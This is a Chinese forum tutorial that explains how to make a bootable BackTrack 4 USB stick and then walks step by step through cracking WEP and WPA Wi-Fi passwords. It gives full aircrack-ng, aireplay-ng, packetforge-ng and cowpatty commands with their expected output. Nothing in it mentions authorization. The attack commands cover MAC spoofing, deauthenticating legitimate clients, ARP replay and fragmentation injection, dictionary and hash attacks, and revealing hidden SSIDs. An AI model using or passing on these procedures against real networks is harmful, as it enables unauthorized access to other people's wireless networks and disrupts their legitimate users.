下面來說說具體步驟:
壹、準備工作:(3個軟件在本文章最後提供下載,ISO文件可自己另行下載)
1、bt4-pre-final.iso (系統鏡像)
2、grub4dos (軟件)
3、dos的引導文件(3個,command、io.sys、msdos.sys )
4、HPUSBFW (惠普的格式化工具)
二、制作步驟:
1、用HPUSBFW軟件,以格式化的方式將DOS引導文件寫入U盤;
2、將grub4dos解壓出來,把裏面的 grldr , Grub.exe , menu.lst 這3個文件復制進U盤根目錄;
3、 把 BT4.iso 裏的 boot ,casper 這2個文件夾復制到U盤根目錄;
4、用 boot\grub 目錄下的 menu.lst 替換掉U盤根目錄下的 menu.lst 這個文件;
三、測試:
1、開機,進入BIOS,設置為U盤優先啟動,然後保存並重啟;
2、開始時會閃過win 98 的啟動界面,然後進入到DOS;
3、輸入命令“grub” ,然後按回車鍵,進入到grub引導模式;
4、根據提示和個人需求選擇自己想要的模式;
5、系統加載完畢後,使用用戶名:root, 密碼:toor ;進行登錄;
6、進入到圖形化界面的命令為 startx 。
好了,所有過程都說明白了,大家快開始自己的BT4之旅吧!
附上上面提及到的3個軟件的下載鏈接:
grub4dos
DOS引導文件 (因為是系統文件的緣故,需要把文件夾屬性中的“隱藏受保護的系統文件”前面的勾去掉,這樣就能顯示所有的文件了。)
HP_USB_磁盤存儲器格式化工具_V2.0.6.rar
WEP破解 BT4破解教程詳細解答問題
WEP破解] BT4破解教程詳細解答 花錢買的,無償給大家看,鄙視收費的人
記錄付費主題, 價格:金幣 3 元 1.下載光盤版BT4VM版和虛擬機,制作虛擬啟動BT4。VM版的BT4可 能都集成網卡無用,但對USB網卡支持很好。
2.啟動BT4,選console控制臺模式,用戶名root,密碼toor<註意不是root>,再運行startx啟動窗口模式。
另:BT4啟動黑屏問題解決辦法
輸入root toor 登錄系統後在輸入 fixvesa 然後 startx如果不行就輸入 fixvmware,然後輸入startx.還是不能就輸入Xorg -configure 然後startx
我的筆記本是三星R458的,啟動BT4,startx時按住空格可以進入.。
在輸入用戶名root 和密碼toor 以後輸入xconf 這時會黑屏壹會,然後出來提示符再輸入startx 可進入
win窗口;當實在不能進入win窗口的時候妳也可以直接在提示符下輸入各破解命令,同時可用alt+f1 打開
壹個shell,alt+f2 打開第二個shell,alt+f3 打開第三個等。關閉窗口用PRINT SCREEN 鍵
---------------------end---------------------
[] 可選
<> 回顯
/ 或者
() 提示
---------------------WEP---------------------
shell 1:----------------------------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
[
macchanger -m 00:11:22:33:44:55 wlan0
<修改自己網卡的MAC 地址。當對方設置了MAC 地址過濾時或為了方便後面輸入>
]
2.ifconfig -a wlan0 up
(可能要加載網卡才支持註入?)
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是頻道)
另壹說5100要支持註入用airmon-ng start wlan0
如果這裏回顯<(monitor mode enabled)> 則下面命令所有端口號要用"wlan0"
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
<Injection is working/No anwser>(註入攻擊成功/不成功)
(檢測妳的網卡是否支持註入)
]
4.airodump-ng -w pack -c 6 mon0/wlan0
(pack是隨便起的獲取的ivs的保存文件的名字)
另壹說用airodump-ng --ivs -w pack -c 6 mon0/wlan0
shell 2:----------------------------------------
壹、有客戶端:
破解:abcd四種方式
a.合法客戶端產生大量有效的數據,能直接獲得大量cap。
收到10000以上data後,直接轉shell 3,破解密碼
b.合法客戶端只能產生少量數據,就需要註入<-3>攻擊加速產生大量數據。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客戶端mac) mon0/wlan0(wlan0測試不行)
<Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多類似行>
c.合法客戶端不在通信,註入模式不成功,
用-0 沖突模式強制斷開合法客戶端和ap連接,使之重新連接,
新連接所產生的握手數據讓-3 獲得有效的ARP從而完成ARP註入
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客戶端mac) wlan0
6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客戶端mac) wlan0
(可能要另開窗)
d.有客戶端,並且客戶端能產生有效arp 數據的另類破解方式
輸入modprobe –r iwl3945
(加載網卡)
輸入modprobe ipwraw
輸入airmon-ng start wlan0 6
現在,只要壹個命令就搞定,輸入:
輸入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。
<key: 12:34:56:78:90>
二、無客戶端:
5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
(我成功了)
另壹說用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0
<Authentication successful>
<Association successful>
(建立虛擬偽裝連接)
如果失敗可嘗試降低網卡速率後再試:iwconfig mon0 rate 2M(註意大寫)
破解:abcd四種方式
a.-2 crack mode ---------------
建立虛擬連接後直接用-2交互攻擊模式集合了抓包,提數據和發包攻擊
6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
發包成功後可得到足夠的ivs,然後用aircrack-ng破解
b.-3 crack mode ---------------
6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0
7.用aircrack-ng破解<自己添加的步驟?>
c.-4 crack mode ---------------
-4攻擊模式;制造數據包;-2交互式攻擊模式
6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0
<?yes>
<Saving keystream in replay_dec-0523-075615.xor>
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp
(提取上面xor 文件來偽造壹個arp包)
8.aireplay-ng -2 -r myarp mon0
壹說用aireplay-ng -2 -r myarp -x 512 mon0
(發現了可利用的myarp的數據包,按y後,立刻註入攻擊。Date瘋漲)
9.用aircrack-ng破解
d.-5 crack mode ---------------
-5碎片攻擊模式;制造數據包;-2交互式攻擊模式
(我成功過)
6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0
<?yes>
<Saving keystream in fragment-1216-201426.xor>
(利用-5 碎片攻擊模式獲得壹個可用的包含密鑰是數據文件(xor 文件))
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
(Myarp隨便起的文件名)
<Wrote packet to: myarp>
8.aireplay-ng -2 -r myarp -x 256/512 mon0
<?yes>
(這時,前面的抓包窗口上的data 將迅速增加)
(512是攻擊速度,1024是最大值)
9.采用aircrack-ng 來進行破解
shell 3:----------------------------------------
aircrack-ng *.cap
如果shell 1用了--ivs 參數,則這裏用aircrack-ng *.ivs
(我成功了)
另壹說用aircrack-ng -n 64 -b APmac pack-01.cap
<KEY FOUND! [......] <ASCII:XXXXX>>
附:
5100用BT4+spoonwep2破解
1.把spoonwep2放在BT4\modules\下,啟動BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<顯示bash為成功,dash為失敗>
3.開spoonwep2,裏面可以找到網卡了,選wlan0進入搜索,但這時不會搜出來什麽,
關閉壹下spoonwep2再重啟spoonwep2,
這時網卡項裏有壹個mon0的,選mon0,driver選normal,mode選unknow victim,選定PO841 replay attack,點擊launch後就等待密
碼的出來(sata數據包到30000個左右)。
(註:論壇中的高手說spoonwep2支持5100AGN網卡註入式破解)
---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是頻道)
4.airodump-ng -w 12345 -c 6 mon0/wlan0
(保存名為12345.cap)
(-w:寫入文件,-c:截取cap的頻道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者輸入:aireplay-ng -0 10 -a (ap mac) -c (合法客戶端mac) mon0/wlan0(wlan0可能不對)
<18:56:20 Sending 64 directed DeAuth,... 壹些類似行>
(-c後面為合法無線客戶端的MAC地址)
(迫使AP重新與已連接的合法客戶端重新握手驗證)
(攻擊幾次後可以做破解嘗試。WPA破解不用等到數據Data 達到幾萬,
因為它只要壹個包含WPA握手驗證包就可以了)
Cap數據包破解:
a.暴力破解
6.aircrack-ng -x -f 2 12345*.cap
另壹說是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典破解
6.aircrack-ng -w password.txt 12345*.cap
另壹說是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
(
-w:是字典破解模式
Password.txt是妳事先準備好的字典。
技巧:可以在windows 下使用下載的字典工具生產字典,再在BackTrack3 下拷貝到/root 下(aircrack 默認
的工作目錄在/root)。
請註意,破解WPA 密碼的時間取決於密碼難易程度,字典包含程度,內存及CPU 等。多則數小時。
)
c.把CAP數據包拷貝出來在WIN下用WinAircrack 破解
啟動WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
Wpa-)Dictionary file-)pswd.txt,點右下角Aircrack the key...
<Key Found! [xxxxxxxx]>
d.HASH破解
6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (註意大小寫)
(Windows版本操作步驟與其Linux下版本完全壹致)
(
參數解釋:
-f 這裏跟上采用的字典
-d 生成的Table文件名稱
-s 目標AP的ESSID
)
7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK
(
參數解釋:
-d 導入WPA PMK Hash Table文件名稱,下圖中為dlink-birth.hash
-r 事先捕獲的WPA握手數據包
-s 目標AP的ESSID
)
---------------------end---------------------
WPA破解,怎麽知道有握手包被截獲?
airodump-ng監視窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65
BT4抓包後,cap文件保存在哪?
輸入ls可以看到啊,默認在root下。
如何獲得合法端mac?
windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具實現對客戶端MAC的攔截,Linux可用
Kismet、Aircrack-ng中的airodump-ng等來實現。需要註意的是,若目標網絡采用WEP或者WPA加密的話,有時需先行破解再對數據
包解密方可看到客戶端MAC。
前面第壹個shell,如下若有station顯示,bb:bb:bb:bb:bb:bb就是合法客戶端mac
BSSID STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb
如何查找隱藏的SSID?
1.在BT4下先打開壹個shell,輸入
airodump-ng 網卡端口
2.打開另壹個shell,輸入
aireplay-ng -0 10 -a AP'MAC -c 合法客戶端'MAC 網卡端口
可能這個命令由於頻道不對會出錯,這時就要多重輸幾次(如果不行,就是不是合法客戶端,要再試其它的客戶端),直到提示成功為止
3.然後就可以在上個shell,看到顯示出來的SSID。